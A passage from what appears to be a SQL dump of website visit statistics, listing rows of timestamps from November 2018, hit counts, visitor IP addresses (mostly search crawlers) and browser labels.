her'),(340769,1543147191,1,1,0,0,'8.29.198.25','other'),(340770,1543147563,2,2,0,0,'95.163.255.167','other'),(340771,1543147597,1,1,0,0,'54.36.149.18','other'),(340772,1543147613,1,1,0,0,'95.163.255.66','other'),(340773,1543147616,1,1,0,0,'95.163.255.65','other'),(340774,1543147708,1,1,0,0,'178.154.244.29','other'),(340775,1543147838,1,1,0,0,'54.36.148.229','other'),(340776,1543148214,1,1,0,0,'46.229.168.139','other'),(340777,1543148217,1,1,0,0,'46.229.168.134','other'),(340778,1543148363,1,1,0,0,'157.55.39.252','other'),(340779,1543148384,1,1,0,0,'40.77.167.85','other'),(340780,1543148656,1,1,0,0,'54.36.149.66','other'),(340781,1543148735,1,1,0,0,'54.36.148.149','other'),(340782,1543149081,2,2,0,0,'66.249.66.157','chrome'),(340784,1543149282,1,1,0,0,'66.249.66.152','chrome'),(340785,1543149390,1,1,0,0,'46.229.168.134','other'),(340786,1543150176,1,1,0,0,'54.36.149.22','other'),(340787,1543150564,1,1,0,0,'40.77.167.162','other'),(340788,1543150837,1,1,0,0,'40.77.167.175','other'),(340789,1543151648,1,1,0,0,'54.36.148.52','other'),(340790,1543151989,1,1,0,0,'141.8.132.16','other'),(340791,1543151992,2,2,0,0,'5.45.207.19','other'),(340792,1543152016,2,2,0,0,'141.8.142.108','other'),(340793,1543152027,1,1,0,0,'213.180.203.40','other'),(340795,1543152109,1,1,0,0,'95.108.213.4','other'),(340796,1543152139,2,2,0,0,'5.45.207.79','other'),(340797,1543152180,1,1,0,0,'93.190.138.231','firefox'),(340798,1543152274,1,1,0,0,'54.36.148.14','other'),(340799,1543153141,1,1,0,0,'178.154.244.65','other'),(340800,1543153142,1,1,0,0,'95.108.181.75','other'),(340801,1543153144,1,1,0,0,'213.180.203.17','other'),(340802,1543153145,1,1,0,0,'141.8.132.16','other'),(340803,1543153532,1,1,0,0,'54.36.148.54','other'),(340804,1543153705,1,1,0,0,'54.36.149.81','other'),(340805,1543153813,1,1,0,0,'46.229.168.136','other'),(340806,1543154715,1,1,0,0,'54.36.148.187','other'),(340807,1543154719,2,2,0,0,'54.36.148.150','other'),(340808,1543154728,1,1,0,0,'46.229.168.134','other'),(340809,1543154745,1,1,0,0,'46.229.168.138','other'),(340810,1543155427,1,1,0,0,'54.36.149.96','other'),(340811,1543155669,2,2,0,0,'178.154.244.29','other'),(340812,1543155691,1,1,0,0,'8.29.198.25','other'),(340813,1543156066,1,1,0,0,'91.196.178.131','chrome'),(340814,1543156543,1,1,0,0,'178.154.244.11','other'),(340816,1543156580,1,1,0,0,'178.154.244.29','other'),(340817,1543156645,1,1,0,0,'46.229.168.148','other'),(340818,1543157017,1,1,0,0,'207.46.13.101','other'),(340819,1543157113,1,1,0,0,'54.36.149.53','other'),(340820,1543157140,2,2,0,0,'91.209.11.236','other'),(340821,1543157281,1,1,0,0,'8.29.198.27','other'),(340822,1543157357,1,1,0,0,'54.36.149.44','other'),(340823,1543157452,1,1,0,0,'54.36.149.88','other'),(340824,1543157453,2,2,0,0,'141.8.142.108','other'),(340825,1543157540,2,2,0,0,'87.250.224.47','other'),(340826,1543157696,1,1,0,0,'178.154.171.69','other'),(340827,1543158025,1,1,0,0,'8.29.198.26','other'),(340828,1543158286,1,1,0,0,'54.36.148.239','other'),(340829,1543158373,1,1,0,0,'66.249.66.44','chrome'),(340830,1543158430,1,1,0,0,'54.36.149.80','other'),(340831,1543158438,1,1,0,0,'141.8.142.108','other'),(340832,1543158488,1,1,0,0,'54.36.148.206','other'),(340833,1543158553,1,1,0,0,'95.163.255.64','other'),(340834,1543158556,1,1,0,0,'95.163.255.63','other'),(340835,1543159054,1,1,0,0,'141.8.142.81','other'),(340836,1543159407,4,4,0,0,'95.163.255.112','other'),(340837,1543159428,1,1,0,0,'95.163.255.114','other'),(340838,1543159454,1,1,0,0,'54.36.148.120','other'),(340839,1543159477,1,1,0,0,'95.163.255.106','other'),(340840,1543159679,1,1,0,0,'66.249.66.156','chrome'),(340842,1543159856,1,1,0,0,'54.36.149.31','other'),(340843,1543159997,1,1,0,0,'54.36.148.114','other'),(340844,1543160031,1,1,0,0,'54.36.148.33','other'),(340845,1543160034,2,2,0,0,'66.249.66.44','chrome'),(340846,1543160296,1,1,0,0,'54.36.148.161','other'),(340847,1543160762,1,1,0,0,'54.36.148.162','other'),(340848,1543160874,1,1,0,0,'66.249.66.57','chrome'),(340849,1543161242,1,1,0,0,'207.46.13.101','other'),(340850,1543161489,1,1,0,0,'46.229.168.130','other'),(340851,1543161819,1,1,0,0,'178.255.215.94','other'),(340852,1543162653,1,1,0,0,'54.36.148.214','other'),(340853,1543162747,1,1,0,0,'46.229.168.152','other'),(340854,1543162751,1,1,0,0,'46.229.168.142','other'),(340855,1543163410,1,1,0,0,'54.36.148.246','other'),(340856,1543163642,1,1,0,0,'46.229.168.148','other'),(340857,1543163643,1,1,0,0,'54.36.148.105','other'),(340858,1543163694,1,1,0,0,'54.36.148.65','other'),(340859,1543163713,1,1,0,0,'54.36.148.20','other'),(340860,1543163820,1,1,0,0,'46.229.168.147','other'),(340861,1543163905,1,1,0,0,'54.36.148.237','other'),(340862,1543163926,1,1,0,0,'66.249.66.154','chrome'),(340863,1543164041,1,1,0,0,'66.249.66.59','chrome'),(340865,1543164133,1,1,0,0,'54.36.148.211','other'),(340866,1543164234,1,1,0,0,'178.255.215.94','other'),(340867,1543164286,1,1,0,0,'46.133.31.174','chrome'),(340868,1543164378,1,1,0,0,'46.229.168.142','other'),(340869,1543164381,1,1,0,0,'46.229.168.138','other'),(340870,1543164525,1,1,0,0,'54.36.149.100','other'),(340871,1543165120,5,5,0,0,'178.154.244.29','other'),(340872,1543165195,5,5,0,0,'178.154.244.11','other'),(340873,1543165233,1,1,0,0,'54.36.149.0','other'),(340874,1543165299,1,1,0,0,'95.163.255.189','other'),(340875,1543165784,1,1,0,0,'5.45.207.79','other'),(340876,1543165817,1,1,0,0,'95.163.255.174','other'),(340877,1543165819,1,1,0,0,'95.163.255.161','other'),(340878,1543165874,1,1,0,0,'207.46.13.136','other'),(340879,1543165906,1,1,0,0,'178.154.171.24','other'),(340880,1543165911,1,1,0,0,'178.154.171.27','other'),(340881,1543166052,1,1,0,0,'178.154.244.65','other'),(340882,1543166493,1,1,0,0,'66.249.66.156','chrome'),(340883,1543166530,1,1,0,0,'8.29.198.25','other'),(340884,1543166567,1,1,0,0,'87.250.224.64','other'),(340885,1543166596,1,1,0,0,'46.229.168.146','other'),(340886,1543166824,1,1,0,0,'95.163.255.97','other'),(340887,1543166973,2,2,0,0,'157.55.39.252','other'),(340888,1543167056,2,2,0,0,'5.45.207.19','other'),(340889,1543167143,1,1,0,0,'5.255.253.38','other'),(340890,1543167147,1,1,0,0,'178.154.244.11','other'),(340891,1543167148,1,1,0,0,'178.154.244.29','other'),(340892,1543168117,1,1,0,0,'8.29.198.26','other'),(340893,1543168863,1,1,0,0,'8.29.198.27','other'),(340894,1543169498,4,4,0,0,'50.63.12.201','chrome'),(340895,1543169970,1,1,0,0,'46.229.168.145','other'),(340896,1543170123,3,3,0,0,'66.249.66.156','chrome'),(340897,1543170277,1,1,0,0,'66.249.66.152','chrome'),(340898,1543170419,1,1,0,0,'157.55.39.252','other'),(340899,1543170846,1,1,0,0,'54.38.176.113','other'),(340900,1543171138,1,1,0,0,'207.46.13.136','other'),(340901,1543171274,1,1,0,0,'46.229.168.143','other'),(340902,1543171278,1,1,0,0,'46.229.168.134','other'),(340903,1543172322,1,1,0,0,'46.211.70.214','chrome'),(340904,1543172860,1,1,0,0,'207.46.13.136','other'),(340905,1543172912,1,0,1,0,'66.249.66.155',''),(340906,1543172913,1,0,1,0,'66.249.66.156',''),(340907,1543172984,2,2,0,0,'193.0.205.171','firefox'),(340908,1543173114,3,3,0,0,'5.45.207.79','other'),(340909,1543173118,3,3,0,0,'178.154.244.11','other'),(340910,1543173202,2,2,0,0,'95.163.255.107','other'),(340911,1543173269,2,2,0,0,'178.154.244.29','other'),(340912,1543173491,1,1,0,0,'66.249.66.157','chrome'),(340913,1543173576,2,2,0,0,'157.55.39.252','other'),(340914,1543173697,1,1,0,0,'40.77.167.175','other'),(340915,1543173808,2,2,0,0,'46.229.168.147','other'),(340916,1543173811,1,1,0,0,'46.229.168.133','other'),(340917,1543173990,2,2,0,0,'93.74.232.137','firefox'),(340918,1543173996,1,1,0,0,'66.249.66.44','chrome'),(340919,1543174095,1,1,0,0,'46.229.168.140','other'),(340920,1543174152,1,1,0,0,'5.45.207.8','other'),(340921,1543175078,1,1,0,0,'66.249.66.154','chrome'),(340922,1543175482,1,1,0,0,'46.229.168.142','other'),(340923,1543175484,1,1,0,0,'46.229.168.147','other'),(340924,1543175800,1,1,0,0,'66.249.66.42','chrome'),(340925,1543176358,1,1,0,0,'207.46.13.136','other'),(340926,1543176434,1,1,0,0,'66.249.66.154','chrome'),(340927,1543176646,1,1,0,0,'46.229.168.142','other'),(340928,1543176974,1,1,0,0,'157.55.39.252','other'),(340929,1543176996,1,1,0,0,'95.163.255.178','other'),(340930,1543177000,1,1,0,0,'95.163.255.181','other'),(340931,1543177373,1,1,0,0,'8.29.198.26','other'),(340932,1543177649,3,3,0,0,'66.249.66.156','chrome'),(340933,1543177759,1,1,0,0,'46.229.168.136','other'),(340934,1543177760,1,1,0,0,'5.45.207.79','other'),(340935,1543177761,1,1,0,0,'178.154.244.29','other'),(340936,1543177858,1,1,0,0,'95.163.255.93','other'),(340937,1543177860,1,1,0,0,'95.163.255.95','other'),(340938,1543177929,1,1,0,0,'207.46.13.136','other'),(340939,1543178178,1,1,0,0,'40.77.167.195','other'),(340940,1543178484,1,1,0,0,'157.55.39.252','other'),(340941,1543178889,1,1,0,0,'207.46.13.136','other'),(340942,1543178968,1,1,0,0,'8.29.198.25','other'),(340943,1543179369,1,1,0,0,'46.211.150.108','chrome'),(340944,1543179623,2,2,0,0,'52.53.201.78','chrome'),(340945,1543179708,1,1,0,0,'8.29.198.27','other'),(340946,1543179729,2,2,0,0,'46.229.168.139','other'),(340947,1543180161,1,1,0,0,'46.229.168.138','other'),(340948,1543180652,1,1,0,0,'46.229.168.151','other'),(340949,1543180655,1,1,0,0,'46.229.168.148','other'),(340950,1543181273,1,1,0,0,'40.77.167.175','other'),(340951,1543181395,2,2,0,0,'66.249.66.156','chrome'),(340952,1543182425,4,4,0,0,'178.154.244.11','other'),(340953,1543182454,2,2,0,0,'5.45.207.19','other'),(340954,1543182516,13,13,0,0,'178.154.244.29','other'),(340955,1543182620,2,2,0,0,'87.250.224.47','other'),(340956,1543182664,2,2,0,0,'5.45.207.79','other'),(340957,1543182775,1,1,0,0,'66.249.66.155','chrome'),(340958,1543182776,2,2,0,0,'66.249.66.154','chrome'),(340959,1543183135,1,1,0,0,'141.8.142.103','other'),(340960,1543183419,3,3,0,0,'178.154.244.11','other'),(340961,1543183609,3,3,0,0,'178.154.244.29','other'),(340962,1543183913,1,1,0,0,'66.249.66.61','chrome'),(340964,1543183951,1,1,0,0,'207.46.13.136','other'),(340965,1543184470,1,1,0,0,'66.249.66.155','chrome'),(340966,1543184471,1,1,0,0,'66.249.66.154','chrome'),(340967,1543184909,1,1,0,0,'66.249.66.157','chrome'),(340969,1543185536,1,1,0,0,'46.229.168.154','other'),(340970,1543185565,1,1,0,0,'46.229.168.150','other'),(340971,1543186267,1,1,0,0,'207.46.13.136','other'),(340972,1543186746,6,6,0,0,'91.193.128.228','chrome'),(340973,1543186936,1,1,0,0,'46.229.168.130','other'),(340974,1543186938,1,1,0,0,'46.229.168.134','other'),(340975,1543187469,1,1,0,0,'66.249.66.157','chrome'),(340976,1543187486,1,1,0,0,'66.249.66.154','chrome'),(340977,1543188221,1,1,0,0,'8.29.198.25','other'),(340978,1543188860,1,1,0,0,'207.46.13.136','other'),(340979,1543189023,1,1,0,0,'37.9.113.148','other'),(340980,1543189026,1,1,0,0,'178.154.244.11','other'),(340981,1543189027,1,1,0,0,'5.45.207.79','other'),(340982,1543189051,1,1,0,0,'178.154.244.29','other'),(340983,1543189453,3,3,0,0,'157.55.39.252','other'),(340984,1543189826,1,1,0,0,'8.29.198.25','other'),(340985,1543190171,1,1,0,0,'130.149.80.199','other'),(340986,1543190420,1,1,0,0,'66.249.66.156','chrome'),(340987,1543190434,1,1,0,0,'66.249.66.154','chrome'),(340988,1543190535,1,1,0,0,'46.229.168.140','other'),(340989,1543190561,1,1,0,0,'8.29.198.27','other'),(340990,1543190824,1,1,0,0,'207.46.13.101','other'),(340991,1543190828,1,1,0,0,'66.249.66.155','chrome'),(340992,1543191082,1,1,0,0,'5.45.207.79','other'),(340993,1543191332,1,1,0,0,'95.163.255.189','other'),(340994,1543191335,1,1,0,0,'95.163.255.155','other'),(340995,1543191635,1,1,0,0,'54.36.149.48','other'),(340996,1543191797,1,1,0,0,'54.36.148.40','other'),(340997,1543191976,1,1,0,0,'157.55.39.252','other'),(340998,1543192196,1,1,0,0,'54.36.148.60','other'),(340999,1543192242,1,1,0,0,'54.36.149.69','other'),(341000,1543192254,1,1,0,0,'54.36.148.36','other'),(341001,1543192427,1,1,0,0,'66.249.66.40','chrome'),(341002,1543193369,2,2,0,0,'157.55.39.252','other'),(341003,1543193432,1,1,0,0,'54.36.148.22','other'),(341004,1543193471,12,12,0,0,'178.154.244.29','other'),(341005,1543193553,10,10,0,0,'178.154.244.11','other'),(341006,1543193800,1,1,0,0,'54.36.148.246','other'),(341007,1543193824,2,2,0,0,'5.45.207.79','other'),(341008,1543194298,1,1,0,0,'5.45.207.19','other'),(341009,1543194395,1,1,0,0,'54.36.149.50','other'),(341010,1543194422,6,6,0,0,'178.154.244.29','other'),(341011,1543194542,2,2,0,0,'178.154.244.11','other'),(341012,1543194699,1,1,0,0,'54.36.148.188','other'),(341013,1543196066,1,1,0,0,'54.36.148.154','other'),(341014,1543196255,2,2,0,0,'5.9.140.242','other'),(341015,1543196289,1,1,0,0,'54.36.148.107','other'),(341016,1543196519,2,2,0,0,'66.249.66.152','chrome'),(341017,1543196585,1,1,0,0,'66.249.66.156','chrome'),(341018,1543196870,1,1,0,0,'46.229.168.143','other'),(341019,1543198137,1,1,0,0,'54.36.149.31','other'),(341020,1543198184,2,2,0,0,'66.249.66.156','chrome'),(341021,1543198185,1,1,0,0,'66.249.66.154','chrome'),(341022,1543198410,1,1,0,0,'207.46.13.136','other'),(341023,1543198436,1,0,1,0,'66.249.66.57',''),(341024,1543198437,1,0,1,0,'66.249.66.40',''),(341025,1543198824,2,2,0,0,'34.216.107.78','chrome'),(341026,1543198854,1,1,0,0,'207.46.13.101','other'),(341027,1543199069,1,1,0,0,'8.29.198.26','other'),(341028,1543199267,1,1,0,0,'66.249.66.157','chrome'),(341029,1543199268,2,2,0,0,'66.249.66.154','chrome'),(341030,1543199553,1,1,0,0,'46.229.168.153','other'),(341031,1543199735,1,1,0,0,'207.46.13.136','other'),(341032,1543200690,2,2,0,0,'8.29.198.25','other'),(341033,1543201100,1,1,0,0,'40.77.167.175','other'),(341034,1543201287,1,1,0,0,'95.163.255.94','other'),(341035,1543201291,1,1,0,0,'95.163.255.97','other'),(341036,1543201366,1,1,0,0,'54.36.149.17','other'),(341037,1543201445,1,1,0,0,'157.55.39.252','other'),(341038,1543201566,1,1,0,0,'66.249.66.155','chrome'),(341039,1543201579,1,1,0,0,'66.249.66.154','chrome'),(341040,1543201863,3,3,0,0,'5.45.207.79','other'),(341041,1543201901,2,2,0,0,'178.154.244.11','other'),(341042,1543202047,1,1,0,0,'37.9.113.148','other'),(341044,1543202053,4,4,0,0,'178.154.244.29','other'),(341045,1543202066,1,1,0,0,'141.8.142.103','other'),(341046,1543202193,1,1,0,0,'46.229.168.148','other'),(341047,1543202194,1,1,0,0,'46.229.168.144','other'),(341048,1543203093,1,1,0,0,'46.229.168.153','other'),(341049,1543203792,1,1,0,0,'178.154.244.11','other'),(341050,1543204339,1,1,0,0,'207.46.13.101','other'),(341051,1543205350,1,1,0,0,'46.229.168.136','other'),(341052,1543205407,1,1,0,0,'46.229.168.132','other'),(341053,1543205883,1,1,0,0,'54.36.148.34','other'),(341054,1543206100,1,1,0,0,'46.229.168.143','other'),(341055,1543206206,1,1,0,0,'54.36.148.191','other'),(341056,1543207121,1,1,0,0,'157.55.39.252','other'),(341057,1543207182,2,2,0,0,'95.163.255.95','other'),(341058,1543207448,1,1,0,0,'66.249.66.152','chrome'),(341059,1543207594,1,1,0,0,'95.163.255.185','other'),(341060,1543207598,1,1,0,0,'95.163.255.165','other'),(341061,1543207733,2,2,0,0,'91.196.178.131','firefox'),(341062,1543208325,1,1,0,0,'54.36.148.66','other'),(341063,1543208549,8,8,0,0,'178.154.244.11','other'),(341064,1543208596,7,7,0,0,'178.154.244.29','other'),(341065,1543208793,1,1,0,0,'159.224.57.11','firefox'),(341066,1543208972,1,1,0,0,'54.36.148.124','other'),(341067,1543209635,1,1,0,0,'66.249.66.156','chrome'),(341068,1543209756,1,1,0,0,'54.36.149.92','other'),(341069,1543209915,1,1,0,0,'8.29.198.26','other'),(341070,1543209988,1,1,0,0,'178.154.244.11','other'),(341071,1543209992,4,4,0,0,'178.154.244.29','other'),(341072,1543210047,1,1,0,0,'207.46.13.101','other'),(341073,1543210147,1,1,0,0,'46.229.168.137','other'),(341074,1543210729,1,1,0,0,'66.249.66.154','chrome'),(341075,1543211469,4,4,0,0,'157.55.39.252','other'),(341076,1543211473,2,2,0,0,'207.46.13.136','other'),(341077,1543211480,3,3,0,0,'207.46.13.101','other'),(341078,1543211483,3,3,0,0,'40.77.167.175','other'),(341079,1543211543,1,1,0,0,'8.29.198.26','other'),(341080,1543212229,3,3,0,0,'95.163.255.98','other'),(341081,1543212230,1,1,0,0,'46.229.168.140','other'),(341082,1543212231,1,1,0,0,'95.163.255.95','other'),(341083,1543212233,1,1,0,0,'46.229.168.145','other'),(341084,1543212249,1,1,0,0,'8.29.198.27','other'),(341085,1543213161,1,1,0,0,'157.55.39.252','other'),(341086,1543213516,1,1,0,0,'31.184.238.115','chrome'),(341087,1543213608,1,1,0,0,'95.163.255.156','other'),(341088,1543213610,1,1,0,0,'95.163.255.172','other'),(341089,1543214126,2,2,0,0,'91.196.178.81','chrome'),(341090,1543214513,1,1,0,0,'46.229.168.133','other'),(341091,1543215745,1,1,0,0,'5.45.207.79','other'),(341092,1543215850,6,6,0,0,'178.154.244.29','other'),(341093,1543215957,4,4,0,0,'178.154.244.11','other'),(341094,1543216066,1,1,0,0,'66.249.66.155','chrome'),(341096,1543216141,2,2,0,0,'91.196.178.78','firefox'),(341097,1543216238,1,1,0,0,'207.46.13.101','other'),(341098,1543216244,1,1,0,0,'54.36.149.39','other'),(341099,1543216276,1,1,0,0,'178.255.215.94','other'),(341100,1543216524,1,1,0,0,'141.8.142.103','other'),(341101,1543217110,1,1,0,0,'193.8.46.59','firefox'),(341102,1543217334,1,1,0,0,'178.154.244.29','other'),(341103,1543217520,1,1,0,0,'66.249.66.155','chrome'),(341104,1543217521,2,2,0,0,'66.249.66.156','chrome'),(341105,1543217657,1,1,0,0,'46.229.168.145','other'),(341106,1543217662,1,1,0,0,'66.249.66.154','chrome'),(341107,1543217702,2,2,0,0,'91.196.178.78','firefox'),(341108,1543217814,1,1,0,0,'95.163.255.178','other'),(341109,1543217821,1,1,0,0,'95.163.255.172','other'),(341110,1543218098,1,1,0,0,'95.163.255.162','other'),(341111,1543218099,1,1,0,0,'95.163.255.195','other'),(341112,1543218111,1,1,0,0,'178.255.215.94','other'),(341113,1543218228,1,1,0,0,'207.46.13.136','other'),(341114,1543218244,1,1,0,0,'54.36.149.64','other'),(341115,1543218310,1,1,0,0,'95.163.255.96','other'),(341116,1543218315,1,1,0,0,'91.124.158.116','firefox'),(341117,1543218638,1,1,0,0,'157.55.39.252','other'),(341118,1543218863,1,1,0,0,'40.77.167.175','other'),(341119,1543218867,1,1,0,0,'46.229.168.137','other'),(341120,1543218921,1,1,0,0,'54.36.149.13','other'),(341121,1543219106,1,1,0,0,'95.163.255.168','other'),(341122,1543219110,1,1,0,0,'95.163.255.165','other'),(341123,1543219730,1,1,0,0,'66.249.66.40','chrome'),(341124,1543219767,1,1,0,0,'207.46.13.136','other'),(341125,1543219769,1,1,0,0,'46.229.168.141','other'),(341126,1543219906,1,1,0,0,'54.36.148.51','other'),(341127,1543220211,4,4,0,0,'91.196.178.169','chrome'),(341128,1543220231,1,1,0,0,'46.229.168.140','other'),(341129,1543220233,1,1,0,0,'46.229.168.144','other'),(341130,1543220247,1,1,0,0,'54.36.148.143','other'),(341131,1543220651,1,1,0,0,'54.36.149.93','other'),(341132,1543220747,1,1,0,0,'8.29.198.25','other'),(341133,1543220873,1,1,0,0,'199.16.157.182','other'),(341134,1543220874,1,1,0,0,'199.16.157.180','other'),(341135,1543221083,1,1,0,0,'46.229.168.141','other'),(341136,1543221085,1,1,0,0,'46.229.168.148','other'),(341137,1543221643,2,2,0,0,'91.196.178.81','chrome'),(341138,1543221707,1,1,0,0,'54.36.148.72','other'),(341139,1543221968,1,1,0,0,'54.36.148.53','other'),(341140,1543222058,2,2,0,0,'40.77.167.175','other'),(341141,1543222092,1,1,0,0,'54.36.148.65','other'),(341142,1543222104,1,1,0,0,'54.36.149.101','other'),(341143,1543222397,2,2,0,0,'8.29.198.27','other'),(341144,1543222776,3,3,0,0,'178.154.244.11','other'),(341145,1543222797,10,10,0,0,'178.154.244.29','other'),(341146,1543222932,2,2,0,0,'5.45.207.79','other'),(341147,1543223057,1,1,0,0,'95.163.255.95','other'),(341148,1543223135,1,1,0,0,'54.36.148.209','other'),(341149,1543223202,1,1,0,0,'54.36.148.54','other'),(341150,1543223454,1,1,0,0,'46.229.168.132','other'),(341151,1543223748,3,3,0,0,'37.53.228.75','chrome'),(341152,1543223786,1,1,0,0,'54.36.148.91','other'),(341153,1543223934,2,2,0,0,'178.154.244.29','other'),(341154,1543224040,1,1,0,0,'66.249.66.156','chrome'),(341155,1543224172,1,1,0,0,'54.36.148.41','other'),(341156,1543224526,1,1,0,0,'207.46.13.136','other'),(341157,1543224659,1,1,0,0,'54.36.149.76','other'),(341158,1543225350,1,1,0,0,'54.36.148.190','other'),(341159,1543225963,1,1,0,0,'107.21.1.8','other'),(341160,1543225965,1,1,0,0,'54.208.102.37','other'),(341161,1543225978,1,1,0,0,'157.55.39.252','other'),(341162,1543226159,1,1,0,0,'54.36.148.10','other'),(341163,1543226276,1,1,0,0,'66.102.9.40','chrome'),(341164,1543226278,1,1,0,0,'130.180.212.26','chrome'),(341165,1543226357,1,1,0,0,'178.95.246.220','chrome'),(341166,1543226780,1,1,0,0,'46.229.168.141','other'),(341167,1543226989,3,3,0,0,'195.10.210.49','chrome'),(341168,1543227368,1,1,0,0,'46.229.168.136','other'),(341169,1543227651,1,1,0,0,'54.36.148.121','other'),(341170,1543227892,1,1,0,0,'195.10.210.49','chrome'),(341171,1543227997,2,2,0,0,'37.53.228.75','chrome'),(341172,1543228185,1,1,0,0,'88.99.194.48','chrome'),(341173,1543228260,3,3,0,0,'91.196.178.169','chrome'),(341174,1543228349,1,1,0,0,'46.229.168.138','other'),(341175,1543228424,1,1,0,0,'66.249.66.44','chrome'),(341176,1543228759,1,1,0,0,'95.163.255.96','other'),(341177,1543228762,1,1,0,0,'95.163.255.99','other'),(341178,1543228773,4,4,0,0,'178.154.244.11','other'),(341179,1543228777,3,3,0,0,'5.45.207.79','other'),(341180,1543228813,8,8,0,0,'178.154.244.29','other'),(341181,1543228847,1,1,0,0,'37.9.113.148','other'),(341182,1543228867,1,1,0,0,'46.211.242.148','chrome'),(341183,1543229157,1,1,0,0,'5.45.207.19','other'),(341184,1543229180,1,1,0,0,'87.250.224.65','other'),(341185,1543229240,1,1,0,0,'87.250.224.47','other'),(341186,1543229328,1,1,0,0,'54.36.149.20','other'),(341187,1543229528,1,1,0,0,'95.163.255.174','other'),(341188,1543229666,1,1,0,0,'54.36.149.16','other'),(341189,1543229769,1,1,0,0,'66.249.66.155','chrome'),(341190,1543229770,1,1,0,0,'66.249.66.152','chrome'),(341191,1543229806,1,1,0,0,'207.46.13.136','other'),(341192,1543229813,1,1,0,0,'54.36.148.226','other'),(341193,1543230005,1,1,0,0,'54.36.149.76','other'),(341194,1543230101,2,2,0,0,'195.10.210.49','chrome'),(341195,1543230410,1,1,0,0,'66.249.66.44','chrome'),(341196,1543230517,1,1,0,0,'54.36.148.150','other'),(341197,1543231148,1,1,0,0,'66.249.66.154','chrome'),(341198,1543231383,4,4,0,0,'207.46.13.136','other'),(341199,1543231579,1,1,0,0,'8.29.198.25','other'),(341200,1543231756,4,4,0,0,'207.46.13.101','other'),(341201,1543231952,2,2,0,0,'130.180.217.199','chrome'),(341202,1543231962,1,1,0,0,'141.8.142.103','other'),(341203,1543231963,1,1,0,0,'95.108.213.4','other'),(341204,1543231968,1,1,0,0,'213.180.203.9','other'),(341205,1543231979,1,1,0,0,'5.255.253.38','other'),(341206,1543232210,1,1,0,0,'46.229.168.151','other'),(341207,1543232303,3,3,0,0,'40.77.167.175','other'),(341208,1543232311,1,1,0,0,'54.36.148.145','other'),(341209,1543232387,2,2,0,0,'157.55.39.252','other'),(341210,1543232844,1,1,0,0,'66.249.66.157','chrome'),(341211,1543233125,6,6,0,0,'207.46.13.136','other'),(341212,1543233210,1,1,0,0,'54.36.148.84','other'),(341213,1543233269,1,1,0,0,'8.29.198.26','other'),(341214,1543233386,1,1,0,0,'40.77.167.175','other'),(341215,1543233590,2,2,0,0,'207.46.13.101','other'),(341216,1543233929,1,1,0,0,'8.29.198.27','other'),(341217,1543233991,3,3,0,0,'178.154.244.29','other'),(341218,1543234151,2,2,0,0,'178.154.244.11','other'),(341219,1543234180,1,1,0,0,'46.229.168.141','other'),(341220,1543234398,1,1,0,0,'5.45.207.79','other'),(341221,1543234607,1,1,0,0,'95.163.255.159','other'),(341222,1543234610,2,2,0,0,'95.163.255.164','other'),(341223,1543234662,4,4,0,0,'157.55.39.252','other'),(341224,1543234744,1,1,0,0,'40.77.167.175','other'),(341225,1543234799,1,1,0,0,'95.163.255.179','other'),(341226,1543234850,1,1,0,0,'66.249.66.156','chrome'),(341227,1543234898,3,3,0,0,'91.196.178.75','chrome'),(341228,1543234906,1,1,0,0,'46.229.168.132','other'),(341229,1543234944,1,1,0,0,'95.163.255.191','other'),(341230,1543234947,1,1,0,0,'95.163.255.157','other'),(341231,1543234974,1,1,0,0,'95.163.255.67','other'),(341232,1543234977,1,1,0,0,'95.163.255.63','other'),(341233,1543235075,2,2,0,0,'91.196.178.77','firefox'),(341234,1543235155,1,1,0,0,'54.36.148.81','other'),(341235,1543235557,3,3,0,0,'207.46.13.136','other'),(341236,1543235575,6,6,0,0,'157.55.39.252','other'),(341237,1543235590,1,1,0,0,'54.36.148.58','other'),(341238,1543235679,1,1,0,0,'54.36.149.51','other'),(341239,1543235713,2,2,0,0,'40.77.167.175','other'),(341240,1543235741,1,1,0,0,'66.249.66.155','chrome'),(341241,1543235742,1,1,0,0,'66.249.66.154','chrome'),(341242,1543236269,1,1,0,0,'54.36.148.143','other'),(341243,1543236329,1,1,0,0,'54.36.148.136','other'),(341244,1543236366,1,1,0,0,'54.36.149.53','other'),(341245,1543236492,1,1,0,0,'54.36.148.189','other'),(341246,1543236587,1,1,0,0,'54.36.148.52','other'),(341247,1543236715,1,1,0,0,'54.36.149.84','other'),(341248,1543236717,1,1,0,0,'40.77.167.175','other'),(341249,1543236841,2,2,0,0,'207.46.13.136','other'),(341250,1543237113,3,3,0,0,'207.46.13.101','other'),(341251,1543237422,3,3,0,0,'157.55.39.252','other'),(341252,1543237481,1,1,0,0,'46.229.168.133','other'),(341253,1543238036,1,1,0,0,'54.36.148.220','other'),(341254,1543238219,1,1,0,0,'212.90.37.29','chrome'),(341255,1543238253,4,4,0,0,'40.77.167.175','other'),(341256,1543238776,1,1,0,0,'54.36.148.90','other'),(341257,1543239382,1,1,0,0,'46.229.168.140','other'),(341258,1543239386,3,3,0,0,'40.77.167.175','other'),(341259,1543239517,2,2,0,0,'157.55.39.252','other'),(341260,1543239616,2,2,0,0,'207.46.13.101','other'),(341261,1543239629,1,1,0,0,'54.36.148.81','other'),(341262,1543239765,2,2,0,0,'95.163.255.92','other'),(341263,1543239932,3,3,0,0,'207.46.13.136','other'),(341264,1543240233,2,2,0,0,'46.229.168.129','other'),(341265,1543240318,1,1,0,0,'54.36.148.94','other'),(341266,1543240491,3,3,0,0,'195.10.210.49','chrome'),(341267,1543241011,2,2,0,0,'157.55.39.252','other'),(341268,1543241186,1,1,0,0,'54.36.148.135','other'),(341269,1543241290,1,1,0,0,'95.163.255.158','other'),(341270,1543241292,1,1,0,0,'95.163.255.184','other'),(341271,1543241459,2,2,0,0,'91.196.178.135','firefox'),(341272,1543241756,1,1,0,0,'54.36.148.132','other'),(341273,1543242007,1,1,0,0,'54.36.148.108','other'),(341274,1543242108,2,2,0,0,'40.77.167.175','other'),(341275,1543242158,2,2,0,0,'157.55.39.252','other'),(341276,1543242437,1,1,0,0,'8.29.198.25','other'),(341277,1543242521,1,1,0,0,'54.36.148.200','other'),(341278,1543242709,1,1,0,0,'54.36.148.181','other'),(341279,1543242783,3,3,0,0,'207.46.13.136','other'),(341280,1543242937,1,1,0,0,'66.249.66.42','chrome'),(341281,1543242991,2,2,0,0,'91.196.178.85','firefox'),(341282,1543243091,2,2,0,0,'157.55.39.252','other'),(341283,1543243214,1,1,0,0,'54.36.149.99','other'),(341284,1543243282,1,1,0,0,'54.36.149.81','other'),(341285,1543243758,2,2,0,0,'40.77.167.175','other'),(341286,1543243962,4,4,0,0,'207.46.13.101','other'),(341287,1543244129,2,2,0,0,'8.29.198.26','other'),(341288,1543244313,1,1,0,0,'5